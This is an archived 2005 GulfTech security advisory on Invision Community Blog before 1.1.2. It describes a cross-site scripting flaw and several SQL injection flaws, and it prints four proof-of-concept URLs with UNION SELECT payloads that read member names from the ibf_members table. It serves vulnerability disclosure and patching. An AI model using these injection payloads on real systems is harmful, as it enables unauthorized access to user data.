Search | Research | Contact Us Tuesday October 10, 2006
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Invision Community Blog Vulnerabilities
June 07, 2005
Vendor : Invision Power Services
URL : http://www.invisionblog.com
Version : Versions Prior To 1.1.2 Final
Risk : Multiple Vulnerabilities


Description:
Invision Blog is a community based blogging software that can be integrated into Invision Power Board. There are several dangerous SQL Injection vulnerabilities, as well as a cross site scripting vulnerability. These vulnerabilities could allow for an attacker to gain access to sensitive data such as password information and render hostile script in the context of a victims browser which could lead to disclosure of sensitive data such as cookie data.


Cross Site Scripting:
There is a cross site scripting issue in Invision Blog that may allow for an attacker to render hostile client side code in a users browser. The vulnerable function convert_highlite_words() doesn't properly sanitize data returned by urldecode() and can be taken advantage of by double hex encoding highlight data.


SQL Injection:
There are a number of serious SQL Injection vulnerabilities in the Invision Blog software. Below are harmless examples that will pull a users name from the database.

http://localhost/index.php?automodule=blog&blogid;=1&cmd;=editentry&eid;=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid;=1&cmd;=replyentry&eid;=99
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid;=1&cmd;=editcomment&eid;=1&
cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_
members%20WHERE%201/*

http://localhost/index.php?automodule=blog&blogid;=1&cmd;=aboutme∣=2'

The last example is not very easy to exploit, but can be exploited with a bit of effort.


Solution:
Updated version of the Invision Blog software have been available for many weeks now. Users should upgrade as soon as possible. Special thanks to the guys at Invision for fixing these issues so quickly :)


Credits:
James Bercegay of the GulfTech Security Research Team


Terms of Use | Disclaimer | About GulfTech
Copyright 2005 GulfTech Research And Development, LLC. All Rights Reserved